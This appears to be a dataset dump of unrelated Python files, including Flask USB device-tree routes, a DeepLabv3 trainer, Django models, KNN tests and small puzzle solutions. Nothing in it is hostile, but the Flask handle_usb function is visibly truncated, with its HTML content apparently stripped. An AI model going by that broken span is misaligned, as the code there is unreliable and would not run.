names.\r\n \"\"\"\r\n\r\n if IGNORE_FILE not in names: return False\r\n del names[:]\r\n return True\r\n\r\ndef normalize_path(path):\r\n \"\"\"\r\n Normalizes the given path, using the characteristics\r\n of the current environment.\r\n\r\n In windows this function adds support for long path names\r\n as defined in the windows specification.\r\n\r\n :type path: String\r\n :param path: The path (to file) value that is going to\r\n be returned as normalized.\r\n :rtype: String\r\n :return: The normalized path, resulting from a series of\r\n normalization processes applied to the \"original\" path.\r\n \"\"\"\r\n\r\n # retrieves the current os name, as it's going to be used\r\n # to determine if windows normalization should be applied\r\n os_name = os.name\r\n\r\n # in case the current operating system 
is windows based and\r\n # the normalized path does start with the long path prefix, it\r\n # must be removed to allow a \"normal\" path normalization\r\n if os_name in WINDOWS_PLATFORMS and path.startswith(LONG_PATH_PREFIX):\r\n # removes the long path prefix from the path\r\n path = path[4:]\r\n\r\n # checks if the path is absolute, as it will be used to determine\r\n # if the path should be normalized as absolute or not\r\n is_absolute_path = os.path.isabs(path)\r\n\r\n # in case the path is not absolute (creates problems in windows\r\n # long path support)\r\n if os_name in WINDOWS_PLATFORMS and not is_absolute_path:\r\n # converts the path to absolute\r\n path = os.path.abspath(path)\r\n\r\n # normalizes the path, using the underlying python function\r\n # that provides a simple normalization process\r\n normalized_path = os.path.normpath(path)\r\n\r\n # in case the current operating system is windows based and\r\n # the normalized path does not start with the long path prefix\r\n if os_name in WINDOWS_PLATFORMS and not normalized_path.startswith(LONG_PATH_PREFIX):\r\n # creates the path in the windows mode, adds\r\n # the support for long path names with the prefix token\r\n normalized_path = LONG_PATH_PREFIX + normalized_path\r\n\r\n # returns the \"final\" normalized path value resulting from\r\n # the various normalization processes applied to original path\r\n return normalized_path\r\n\r\ndef configuration(file_path = None, **kwargs):\r\n \"\"\"\r\n Retrieves the configuration map(s) for the given arguments,\r\n the keyword based arguments are used as the configuration\r\n in case no valid configuration file exists (fallback).\r\n\r\n :type file_path: String\r\n :param file_path: The path to the file that is going to be\r\n processed as the configuration file in context.\r\n :rtype: Dictionary\r\n :return: The configuration structure/map, taking into account\r\n the current location structure.\r\n \"\"\"\r\n\r\n # in case the configuration file path is defined, meaning that\r\n # a configuration file is expected to be loaded\r\n if file_path:\r\n # retrieves the configuration directory from the configuration\r\n # file path (the directory is going to be used to include the module)\r\n directory_path = os.path.dirname(file_path)\r\n directory_path = os.path.abspath(directory_path)\r\n\r\n # in case the (configuration directory) path is valid inserts it into the\r\n # system path, so that it's possible to load python files from it\r\n directory_path and sys.path.insert(0, directory_path)\r\n\r\n # retrieves the configuration file base path from the configuration file path\r\n file_base_path = os.path.basename(file_path)\r\n\r\n # retrieves the configuration module name and the configuration module extension\r\n # by splitting the configuration base path into base name and extension\r\n module_name, _module_extension = os.path.splitext(file_base_path)\r\n\r\n # imports the configuration module and retrieves the configurations\r\n # variable containing the \"final\" configuration structure\r\n configuration = __import__(module_name)\r\n configurations = configuration.configurations\r\n\r\n # otherwise the provided arguments (through keyword) are going to be used\r\n # as the basis for the creation of the configurations\r\n else:\r\n # creates the configurations tuple with the base configurations\r\n # coming from the keyword based arguments (as expected)\r\n configurations = (kwargs,)\r\n\r\n return 
configurations\r\n","repo_name":"hivesolutions/admin-scripts","sub_path":"src/admin_scripts/extra/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":6955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"1644181648","text":"import json\nimport logging\nfrom datetime import datetime\nfrom http import HTTPStatus\n\nimport astutus.usb\nimport flask\nimport flask.logging\n\nlogger = logging.getLogger(__name__)\n\nusb_page = flask.Blueprint('usb', __name__, template_folder='templates')\n\n\ndef get_alias_path_item_list():\n aliases = astutus.usb.device_aliases.DeviceAliases(filepath=None)\n alias_by_resolved_name = {}\n for key, alias in aliases.items():\n logger.debug(f\"alias: {alias}\")\n # Need to have a good name for display. For now just use description template\n # if the name is not defined. Long term, need to make sure name is defined\n # and unique.\n resolved_name = alias.get('name', alias['description_template'])\n while True:\n if resolved_name not in alias_by_resolved_name:\n alias_by_resolved_name[resolved_name] = {'value': alias['pattern'], 'link_text': resolved_name}\n break\n else:\n resolved_name += \"+\"\n # Sort before returning list.\n items_list = []\n sorted_keys = sorted([key for key in alias_by_resolved_name.keys()])\n for key in sorted_keys:\n items_list.append(alias_by_resolved_name[key])\n return items_list\n\n\ndef get_config_items_list():\n device_configurations = astutus.usb.DeviceConfigurations()\n items_list = []\n for config in device_configurations.items():\n items_list.append({'value': config.idx, 'link_text': config.name})\n return items_list\n\n\n@usb_page.route('/astutus/app/usb/index.html', methods=['GET'])\ndef handle_usb():\n if flask.request.method == 'GET':\n links_list = [\n '
')\n return '\\n' + '\\n'.join(lines)\n\n\n@usb_page.route('/astutus/app/usb/label/sys/<path:path>', methods=['PUT'])\ndef handle_label(path):\n # Intent is to get JSON here, rather than form data.\n # logger.info(f\"flask.request.data: {flask.request.data}\")\n # logger.info(f\"flask.request.headers: {flask.request.headers}\")\n # logger.info(f\"flask.request.is_json: {flask.request.is_json}\")\n if flask.request.is_json:\n request_data = flask.request.get_json(force=True)\n logger.debug(f\"request_data: {request_data}\")\n # logger.info(f\"request_data.get('alias'): {request_data.get('alias')}\")\n alias = request_data.get('alias')\n sys_devices_path = '/sys/' + path\n data = request_data.get('data')\n # TODO: Pass configuration from web page. Maybe security risk. Need to consider protection from\n # running arbitrary code.\n config_data = request_data.get('device_config')\n if config_data is not None:\n device_config = astutus.usb.DeviceConfiguration(config_data)\n else:\n if data.get('ilk') == 'pci':\n device_config = astutus.usb.DeviceConfigurations.make_pci_configuration(data)\n elif data.get('ilk') == 'usb':\n device_config = astutus.usb.DeviceConfigurations.make_generic_usb_configuration(data)\n elif data.get('ilk') == 'other':\n device_config = astutus.usb.DeviceConfigurations.make_generic_other_configuration(data)\n else:\n raise NotImplementedError(f\"Unhandled ilk: {data.get('ilk')}\")\n logger.debug(f\"device_config: {device_config}\")\n node_data = astutus.usb.tree.get_node_data(data, device_config, alias)\n logger.debug(f\"node_data: {node_data}\")\n result = {\n 'html_label': node_data.get('html_label'),\n 'sys_devices_path': sys_devices_path,\n 'node_data': node_data,\n }\n return result, HTTPStatus.OK\n\n\n@usb_page.route('/astutus/app/usb/sys/<path:path>', methods=['GET', 'PATCH', 'PUT'])\ndef handle_device_tree_item(path):\n logger.info('Start handle_device_tree_item')\n sys_devices_path = '/sys/' + path\n logger.debug(f'sys_devices_path: {sys_devices_path}')\n if sys_devices_path == '/sys/devices':\n data = {\n 'data_for_dir': {\n 'node_id': 'other(devices)',\n 'top_of_tree': True,\n 'dirpath': '/sys/devices',\n 'dirname': 'devices',\n 'ilk': 'other',\n },\n }\n return data, HTTPStatus.OK\n request_data = flask.request.get_json(force=True)\n pci_device_info_arg = request_data.get('pciDeviceInfo')\n logger.debug(f'pci_device_info_arg: {pci_device_info_arg}')\n if path == 'devices/pci0000:00':\n pci_device_info = None\n ilk = \"other\"\n elif pci_device_info_arg == \"Nothing!\":\n pci_device_info = None\n ilk = \"usb\"\n else:\n pci_device_info = json.loads(pci_device_info_arg.replace(\"'\", '\"'))\n ilk = \"pci\"\n data = astutus.usb.tree.get_data_for_dirpath(ilk, sys_devices_path, pci_device_info)\n data_for_return = {\n 'data_for_dir': data,\n }\n return data_for_return, HTTPStatus.OK\n\n\n@usb_page.route('/astutus/app/usb/device_tree.html', methods=['GET', 'POST'])\ndef handle_usb_device():\n if flask.request.method == 'GET':\n begin = datetime.now()\n logger.info(\"Start device tree data creation\")\n pci_device_info_map = astutus.util.pci.get_slot_to_device_info_map_from_lspci()\n logger.debug(f\"pci_device_info_map: {pci_device_info_map}\")\n device_tree = astutus.usb.UsbDeviceTree(basepath=None, device_aliases_filepath=None)\n device_configurations = astutus.usb.DeviceConfigurations()\n bare_tree_dict = device_tree.execute_tree_cmd(to_bare_tree=True)\n bare_tree_html = tree_to_html(bare_tree_dict, pci_device_info_map)\n aliases = 
astutus.usb.device_aliases.DeviceAliases(filepath=None)\n background_color = astutus.util.get_setting('/astutus/app/usb/settings', 'background_color', \"#fcfcfc\")\n delta = datetime.now() - begin\n logger.info(f\"Start rendering template for device tree. Generation time: {delta.total_seconds()}\")\n\n return flask.render_template(\n 'app/usb/styled_device_tree.html',\n bare_tree=bare_tree_html,\n aliases_javascript=aliases.to_javascript(),\n configurations_javascript=device_configurations.to_javascript(),\n tree_html=None,\n tree_html_background_color=background_color)\n if flask.request.method == 'POST':\n form = flask.request.form\n if form.get(\"action\") == \"add_or_update_alias\":\n logger.info(\"Handle add_or_update_alias\")\n nodepath = form.get('nodepath')\n logger.debug(f\"nodepath: {nodepath}\")\n template = form.get('template')\n logger.debug(f\"template: {template}\")\n color = form.get('color')\n logger.debug(f\"color: {color}\")\n name = form.get('name')\n if name is None:\n name = nodepath\n aliases = astutus.usb.device_aliases.DeviceAliases(filepath=None)\n aliases[nodepath] = {\n \"name\": name,\n \"color\": f\"{color}\",\n \"description_template\": f\"{template}\",\n \"order\": \"00\",\n \"priority\": 50\n }\n astutus.usb.device_aliases.DeviceAliases.write_raw_as_json(filepath=None, raw_aliases=aliases)\n return flask.redirect(flask.url_for('usb.handle_usb_device'))\n return \"Unhandled post\", HTTPStatus.NOT_IMPLEMENTED\n\n\n@usb_page.route('/astutus/app/usb/alias.html', methods=['GET'])\ndef handle_usb_alias():\n if flask.request.method == 'GET':\n aliases = astutus.usb.device_aliases.DeviceAliases(filepath=None)\n return flask.render_template(\n 'app/usb/styled_alias.html',\n aliases=aliases,\n nodepath_item_list=get_alias_path_item_list())\n\n\n@usb_page.route('/astutus/app/usb/alias/<nodepath>/index.html', methods=['GET', \"DELETE\", \"POST\"])\ndef handle_usb_alias_item(nodepath):\n if flask.request.method == 'GET':\n item = {\n 'id': nodepath,\n }\n aliases = astutus.usb.device_aliases.DeviceAliases(filepath=None)\n alias = aliases.get(nodepath)\n if alias is not None:\n return flask.render_template(\n 'app/usb/alias/nodepath/styled_index.html',\n item=item,\n nodepath=nodepath,\n alias=alias,\n nodepath_item_list=get_alias_path_item_list())\n return f\"No alias for {nodepath} found.\", HTTPStatus.BAD_REQUEST\n if flask.request.method == 'DELETE':\n logger.debug(f\"Delete the item now: {nodepath}\")\n aliases = astutus.usb.device_aliases.DeviceAliases(filepath=None)\n logger.debug(f\"aliases: {aliases}\")\n del aliases[nodepath]\n logger.debug(f\"After deletion: aliases: {aliases}\")\n aliases.write(filepath=None)\n logger.debug(f\"After write: aliases: {aliases}\")\n data = {\n \"redirect_url\": \"/astutus/app/usb/alias.html\"\n }\n return data, HTTPStatus.ACCEPTED\n if flask.request.method == 'POST':\n form = flask.request.form\n name = form.get('name')\n pattern = form.get('pattern')\n template = form.get('template')\n color = form.get('color')\n order = form.get('order')\n priority = form.get('priority')\n alias = {\n 'name': name,\n 'pattern': pattern,\n 'description_template': template,\n 'color': color,\n 'order': order,\n 'priority': priority\n }\n logger.info(f\"alias: {alias}\")\n original_pattern = form.get('original_pattern')\n aliases = astutus.usb.device_aliases.DeviceAliases(filepath=None)\n del aliases[original_pattern]\n aliases[pattern] = alias\n aliases.write(filepath=None)\n return 
flask.redirect(flask.url_for('usb.handle_usb_alias'))\n\n\n@usb_page.route('/astutus/app/usb/configuration.html', methods=['GET'])\ndef handle_usb_configuration():\n if flask.request.method == 'GET':\n device_configurations = astutus.usb.DeviceConfigurations()\n logger.debug(f\"device_configurations: {device_configurations}\")\n return flask.render_template(\n 'app/usb/styled_device_id.html',\n device_configurations=device_configurations,\n nodeid_item_list=get_config_items_list())\n\n\n@usb_page.route('/astutus/app/usb/configuration/<nodeid>/index.html', methods=['GET'])\ndef handle_usb_configuration_item(nodeid):\n if flask.request.method == 'GET':\n device_configurations = astutus.usb.DeviceConfigurations()\n device_config = device_configurations.get_item(nodeid)\n return flask.render_template(\n 'app/usb/device_id/nodeid/styled_index.html',\n item=nodeid,\n nodeid=nodeid,\n device_config=device_config,\n nodeid_item_list=get_config_items_list())\n\n\n@usb_page.route('/astutus/app/usb/settings', methods=['GET', 'PATCH'])\ndef handle_usb_settings():\n if flask.request.method == 'GET':\n return \"Should return settings here\", HTTPStatus.NOT_IMPLEMENTED\n if flask.request.method == 'PATCH':\n request_data = flask.request.get_json(force=True)\n background_color = request_data.get('background-color')\n if background_color is not None:\n logger.info(f\"background_color: {background_color}\")\n astutus.util.persist_setting('/astutus/app/usb/settings', 'background_color', background_color)\n return \"Setting persisted\", HTTPStatus.OK\n return \"Need to persist settings here\", HTTPStatus.NOT_IMPLEMENTED\n\n\n@usb_page.route('/astutus/app/usb/device/<nodepath>/index.html', methods=['GET'])\ndef handle_usb_device_item(nodepath):\n if flask.request.method == 'GET':\n sys_devices_path = flask.request.args.get('sys_device_path')\n sys_devices_path += '/' # to pick up last element\n device_paths = []\n idx = 5\n while idx > 0:\n idx = sys_devices_path.find('/', idx + 1)\n if idx > 0:\n device_paths.append(sys_devices_path[:idx])\n logger.debug(f\"device_paths: {device_paths}\")\n node_data_searcher = astutus.usb.NodeDataSearcher()\n node_data_list = []\n for device_path in device_paths:\n node_data_list.append(node_data_searcher.get_node_data(device_path))\n\n extra_fields_for_ilk = {\n 'usb': ['nodepath', 'vendor', 'product_text', 'device_class'],\n 'pci': ['nodepath'],\n }\n device_classifier = astutus.usb.DeviceClassifier(expire_seconds=10)\n device_data_list = []\n for device_path in device_paths:\n device_data = device_classifier.get_device_data(device_path)\n extra_fields = extra_fields_for_ilk.get(device_data['ilk'])\n if extra_fields is not None:\n device_data = device_classifier.get_device_data(device_path, extra_fields)\n device_data_list.append(device_data)\n\n extra_fields_for_node_id = {\n 'usb(046d:c52b)': ['logitech_unifying_receiver_input_type'],\n }\n for device_path in device_paths:\n device_data = device_classifier.get_device_data(device_path)\n extra_fields = extra_fields_for_node_id.get(device_data['node_id'])\n if extra_fields is not None:\n device_classifier.get_device_data(device_path, extra_fields)\n rules = [\n {\n 'checks': [\n {'field': 'ilk', 'equals': 'usb'},\n {'field': 'node_id', 'equals': 'usb(1a86:7523)'},\n {'field': 'nodepath', 'contains': 'usb(05e3:0610)'},\n ],\n 'extra_fields': ['tty'],\n 'template': '{color_purple} {vendor} {product_text} {tty} {end_color}'\n },\n {\n 'checks': [\n {'field': 'ilk', 'equals': 'usb'},\n {'field': 'node_id', 'equals': 'usb(1a86:7523)'},\n ],\n 
'extra_fields': ['tty'],\n 'template': '{color_for_usb} {vendor} {product_text} {tty} {end_color}'\n },\n {\n 'checks': [{'field': 'ilk', 'equals': 'pci'}],\n 'template': '{color_for_pci} {vendor} {product_text} {end_color}'\n },\n {\n 'checks': [{'field': 'ilk', 'equals': 'usb'}],\n 'template': '{color_for_usb} {vendor} {product_text} {end_color}'\n },\n {\n 'checks': [{'field': 'ilk', 'equals': 'other'}],\n 'template': '{color_for_other} {node_id} {end_color}'\n },\n {\n 'template': '{node_id}'\n }\n ]\n html_formatting_data = {\n 'color_for_usb': '',\n 'color_for_pci': '',\n 'color_for_other': '',\n 'color_purple': '',\n 'end_color': ''\n }\n\n labels = []\n for device_path in device_paths:\n device_data = device_classifier.get_device_data(device_path)\n template = device_classifier.get_template(device_path, rules)\n label = device_classifier.get_label(device_path, rules, html_formatting_data)\n augumented_label = f\"{device_data['dirname']} {label} - template: {template}\"\n labels.append(augumented_label)\n\n return flask.render_template(\n 'app/usb/device/nodepath/styled_index.html',\n device_id_list=[],\n alias_list=[],\n node_data_list=node_data_list,\n device_data_list=device_data_list,\n labels=labels)\n","repo_name":"rich-dobbs-13440/astutus","sub_path":"src/astutus/web/usb_pages.py","file_name":"usb_pages.py","file_ext":"py","file_size_in_byte":17931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"42579654609","text":"import copy\nimport csv\nimport os\nimport time\n\nimport numpy as np\nimport torch\nfrom tqdm import tqdm\n\nfrom torchvision.models.segmentation.deeplabv3 import DeepLabHead\nfrom torchvision import models\n\nclass DeepLabv3Model:\n def __init__(self, batch_size, device, n_classes, criterion, epochs, lr=1e-4):\n self.batch_size = batch_size\n self.device = device\n self.resnet_penultimate_layer_sizes=[512,512,2048,2048] #for 18,34,50,101\n self.n_classes = n_classes\n self.criterion=criterion\n self.epochs=epochs\n self.lr = lr\n \n self.model = self.build(out_channels = self.n_classes)\n self.optimizer = torch.optim.Adam(self.model.parameters(), lr=self.lr)\n \n\n def build(self, out_channels=6):\n model = models.segmentation.deeplabv3_resnet50(pretrained=True,\n progress=True)\n model.classifier = DeepLabHead(2048, out_channels)\n model.train()\n model.to(self.device)\n return model\n \n\n def train(self, train_loader, test_loader, metrics, logdir):\n since = time.time()\n best_weights = copy.deepcopy(self.model.state_dict())\n best_loss = 1e10\n\n fieldnames = ['epoch', 'train_loss', 'test_loss'] + \\\n [f'train_{m}' for m in metrics.keys()] + \\\n [f'test_{m}' for m in metrics.keys()]\n\n with open(os.path.join(logdir, 'log.csv'), 'w', newline='') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n\n for epoch in range(1, self.epochs + 1):\n print('Epoch {}/{}'.format(epoch, self.epochs))\n print('-' * 10)\n log = {a: [0] for a in fieldnames}\n log['epoch'] = epoch\n\n #TRAIN\n self.model.train()\n\n for imgs, masks in tqdm(train_loader):\n imgs = imgs.to(self.device)\n masks = masks.to(self.device)\n\n self.optimizer.zero_grad()\n\n with torch.set_grad_enabled(True):\n outputs = self.model(imgs)\n loss = self.criterion(outputs['out'], masks)\n y_pred = outputs['out'].data.cpu().numpy().ravel()\n y_true = masks.data.cpu().numpy().ravel()\n for name, metric in metrics.items():\n if name == 'f1_score':\n log[f'train_{name}'].append(\n metric(y_true > 0, y_pred > 0.1))\n else:\n log[f'train_{name}'].append(\n metric(y_true.astype('uint8'), y_pred))\n\n loss.backward()\n self.optimizer.step()\n\n train_loss = loss.item()\n\n #VALIDATION\n self.model.eval()\n\n for imgs,masks in tqdm(test_loader):\n imgs = imgs.to(self.device)\n masks = masks.to(self.device)\n\n with torch.set_grad_enabled(False):\n outputs = self.model(imgs)\n loss = self.criterion(outputs['out'], masks)\n y_pred = outputs['out'].data.cpu().numpy().ravel()\n y_true = masks.data.cpu().numpy().ravel()\n for name, metric in metrics.items():\n if name == 'f1_score':\n log[f'test_{name}'].append(\n metric(y_true > 0, y_pred > 0.1))\n else:\n log[f'test_{name}'].append(\n metric(y_true.astype('uint8'), y_pred))\n\n test_loss = loss.item()\n\n\n log[f'train_loss'] = train_loss\n log[f'test_loss'] = test_loss\n print('Train: {:.4f}'.format(train_loss))\n print('Test: {:.4f}'.format(test_loss)) \n\n for field in fieldnames[3:]:\n log[field] = np.mean(log[field])\n\n print(log)\n\n with open(os.path.join(logdir, 'log.csv'), 'a', newline='') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writerow(log)\n\n if test_loss < best_loss:\n best_loss = test_loss\n best_weights = copy.deepcopy(self.model.state_dict())\n \n torch.save(self.model, os.path.join(logdir, 'deeplabv3_model.pt'))\n torch.save(self.model.state_dict(), os.path.join(logdir, 'deeplabv3_weights.pt'))\n\n time_elapsed = time.time() - since\n print('Training 
complete in {:.0f}m {:.0f}s'.format(\n time_elapsed // 60, time_elapsed % 60))\n print('Lowest Loss: {:4f}'.format(best_loss))\n\n # load best model weights\n self.model.load_state_dict(best_weights)\n \n torch.save(self.model, os.path.join(logdir, 'deeplabv3_model.pt'))\n torch.save(self.model.state_dict(), os.path.join(logdir, 'deeplabv3_weights.pt'))\n","repo_name":"Andrewwango/vegetation-segmentation","sub_path":"vegetation-segmentation/deeplabv3/deeplabmodel.py","file_name":"deeplabmodel.py","file_ext":"py","file_size_in_byte":5114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"376102213","text":"N = int(input())\ndef data(n):\n cnt = 0\n if n < 100: # every number below 100 is a hansu (its digits form an arithmetic sequence)\n return n\n else:\n for i in range(100,n+1): # for numbers >= 100, turn the number into a string, then into a list of digits\n lst = list(map(int,str(i))) \n a= lst[0]-lst[1] # difference between the first and second digits\n for j in range(1,len(lst)-1): # check from the difference of the second and third digits onwards; break if it differs from a\n if lst[j]-lst[j+1] != a:\n break\n else: # the loop finished without a break, so this is a hansu; increase the count\n cnt+=1\n return cnt+ 99 # count of hansu below 100 + count of hansu from 100 upwards\nprint(data(N))\n","repo_name":"DailyStudy08/ajin_baekjoon","sub_path":"1065.py","file_name":"1065.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"800804711","text":"from django.db import models\n\nNULLABLE = {'null': True, 'blank': True}\n\n\nclass Autoparts(models.Model):\n manufacturer = models.CharField(max_length=150, verbose_name='Производитель')\n art = models.CharField(max_length=150, verbose_name='Артикул')\n description = models.TextField(verbose_name='Описание')\n qty = models.IntegerField(verbose_name='Количество')\n price = models.DecimalField(**NULLABLE, max_digits=19, decimal_places=2, verbose_name='Цена')\n # price = models.CharField(max_length=150, **NULLABLE, verbose_name='Цена')\n storage_location = models.CharField(**NULLABLE, max_length=100, verbose_name='Место хранения', default='нет данных')\n ref_storage = models.CharField(**NULLABLE, max_length=100, verbose_name='Изменённое место хранения')\n delivery_date = models.DateField(**NULLABLE, verbose_name='Дата доставки', default='нет данных')\n supplier = models.TextField(**NULLABLE, verbose_name='Поставщик', default='нет данных')\n product_is_accepted = models.BooleanField(default=False)\n photo = models.ImageField(**NULLABLE, upload_to='blog/', verbose_name='Изображение')\n\n # warehouse = models.CharField(**NULLABLE, max_length=200, verbose_name='Склад хранения')\n\n def __str__(self):\n return f'{self.pk} Производитель: {self.manufacturer} {self.art}'\n\n class Meta:\n ordering = ['product_is_accepted', '-art']\n verbose_name = 'Деталь'\n verbose_name_plural = 'Детали'\n","repo_name":"illustratorOut/333333","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"40544820250","text":"from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\n\nfrom api.views import ProductViewSet, OrderApi\n\napp_name = 'api'\n\nrouter = DefaultRouter()\nrouter.register(r'product', ProductViewSet)\n\nurlpatterns = [\n path('', include(router.urls)),\n path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n path('order//', OrderApi.as_view(), name='order_api'),\n]\n","repo_name":"violettalivada/hw_48","sub_path":"source/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"9001245584","text":"from django.contrib import admin\nfrom django.urls import path,include\nfrom student_dash import views\n\nurlpatterns = [\n path('stats/',views.dash, name='statistics'),\n path('',views.infoscreen, name='dashboard'),\n path('allstats/',views.staff_info, name='allstats'),\n path('signup/', views.signup, name='signup'),\n path('reports/',views.report, name='reports'),\n path('finance/',views.finance,name='finance'),\n path('nav/',views.nav,name='nav'),\n path('accounts/', include('django.contrib.auth.urls')),\n\n]","repo_name":"Keletsomaleka/PHC_Reporting","sub_path":"school_too/student_dash/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"40029028981","text":"# This file contains the definition of the class UserDetails\n\n# imports to calculate distances of users from a reference point\nfrom math import sin, cos, radians, acos\n\nEARTH_RADIUS = 6371.0 # kilometers\n\n# class for a User, will contain all information pertaining to a user\nclass UserDetails(object):\n def __init__(self, _name, _user_id, _latitude, _longitude):\n '''\n stores members : user name, user id, latitude in radians and longitude in radians.\n The class will be used to store user details in its members and \n will have ability to calculate a users distance from a certain point on the earth.\n An object of this class can be constructed from a Json block containing the required member information\n '''\n \n self.name = _name\n self.user_id = _user_id\n self.radian_latitude = radians(_latitude)\n self.radian_longitude = radians(_longitude)\n \n def print(self):\n print(self.name)\n print(self.user_id)\n print(self.radian_latitude)\n print(self.radian_longitude)\n\n def get_distance_from_pt(self, reference_latitude, reference_longitude):\n '''\n Member function to calculate the user's distance from a reference point on the earth\n Input args: \n 1. reference point latitude in degrees, Type : float (+ve or -ve)\n 2. reference point longitude in degrees, Type : float (+ve or -ve)\n Return value:\n distance from reference point in kilometers, Type: +ve float number\n '''\n radian_reference_latitude = radians(reference_latitude)\n radian_reference_longitude = radians(reference_longitude)\n \n # using first formula from Wikipedia page to calculate distance\n # https://en.wikipedia.org/wiki/Great-circle_distance\n\n longitude_delta = self.radian_longitude - radian_reference_longitude\n central_angle = acos( \n sin(self.radian_latitude) * sin(radian_reference_latitude) \n + cos(self.radian_latitude) * cos(radian_reference_latitude) * cos(longitude_delta)\n )\n\n distance_from_reference = EARTH_RADIUS * central_angle\n return distance_from_reference\n \n @classmethod\n def from_json(self, json_dict):\n '''\n Method to contruct a UserDetails object from a json encoded line\n input args: 1. json encoded line containing relevant user details\n '''\n if all (keys in json_dict for keys in ('name', 'user_id', 'latitude', 'longitude')):\n return UserDetails(json_dict['name'], json_dict['user_id'], float(json_dict['latitude']), float(json_dict['longitude']))","repo_name":"punkiller/craic-party-invitation","sub_path":"user_details.py","file_name":"user_details.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"2216546334","text":"\"\"\"Runs the tests\"\"\"\n\nimport metnum\nimport unittest\n\nimport numpy as np\nimport scipy\n\nclass TestKNNClassifier(unittest.TestCase):\n def test_same(self):\n \"\"\"Tests that predicting the training matrix gives the same result\"\"\"\n classifier = metnum.KNNClassifier(1, \"uniform\")\n\n X_train = np.array([\n [1, 2, 3],\n [6, 6, 6],\n [0, 1, 0],\n ])\n\n y_train = np.array([\n [0],\n [2],\n [3],\n ])\n\n classifier.fit(X_train, y_train)\n \n y = classifier.predict(X_train)\n\n self.assertTrue(np.allclose(y.reshape(3, 1), y_train))\n \n def test_little(self):\n \"\"\"Tests a case in R2\"\"\"\n classifier = metnum.KNNClassifier(3, \"uniform\")\n\n X_train = np.array([\n [0, 0], [1, 0], [0, 1], [1, 1],\n [5, 5], [6, 5], [5, 6], [6, 6],\n [20, 20], [21, 20], [20, 22], [22, 20],\n ])\n\n y_train = np.array([\n [0], [0], [0], [0],\n [5], [5], [5], [5],\n [9], [9], [9], [9],\n ])\n\n classifier.fit(X_train, y_train)\n\n X = np.array([\n [15, 15], # 9\n [10, 10], # 5\n [2, 2], # 0\n ])\n\n want = np.array([9.0, 5.0, 0.0])\n got = classifier.predict(X)\n\n assertAllClose(self, want, got)\n\n\n def test_weights(self):\n \"\"\"Tests the weights\"\"\"\n\n # First, a case that considers all the neighbors; on a tie it\n # should return the first one.\n classifier = metnum.KNNClassifier(12, \"uniform\")\n\n X_train = np.array([\n [20, 20], [21, 20], [20, 22], [22, 20],\n [0, 0], [1, 0], [0, 1], [1, 1],\n [5, 5], [6, 5], [5, 6], [6, 6],\n ])\n\n y_train = np.array([\n [9], [9], [9], [9],\n [0], [0], [0], [0],\n [5], [5], [5], [5],\n ])\n\n classifier.fit(X_train, y_train)\n\n X = np.array([\n [15, 15], # should give 9\n ])\n\n got = classifier.predict(X)\n assertAllClose(self, np.array([0.0]), got)\n\n # predicting with distance as the weights\n # should give the correct value\n classifier = metnum.KNNClassifier(12, \"distance\")\n classifier.fit(X_train, y_train)\n\n got = classifier.predict(X)\n assertAllClose(self, np.array([9.0]), got)\n\nclass TestPowerIteration(unittest.TestCase):\n def assertEigenpair(self, X, a, v):\n assertAllClose(self, np.abs(X @ v), np.abs(a * v))\n\n def test_diagonal(self):\n X = np.diag([3, -10, 2])\n a, v = metnum.power_iteration(X)\n v = v.reshape(3, 1)\n self.assertEigenpair(X, a, v)\n\n def test_single_item(self):\n X = np.array([20])\n a, v = metnum.power_iteration(X)\n self.assertEigenpair(X, a, v)\n\ndef assertAllClose(self, want, got):\n \"\"\"Checks that two vectors are np.allclose\"\"\"\n self.assertTrue(np.allclose(want, got), f\"want: {want}, but got: {got}\")\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"mnPanic/metnum-tp2","sub_path":"notebooks/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"24435419175","text":"def main():\n filename = \"rosalind_tree.txt\"\n\n with open(filename) as f:\n n = int(f.readline().strip())\n edges = [tuple(map(int, line.strip().split())) for line in f.readlines()]\n\n print(n - len(edges) - 1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"alex-stephens/rosalind","sub_path":"rosalind_tree.py","file_name":"rosalind_tree.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
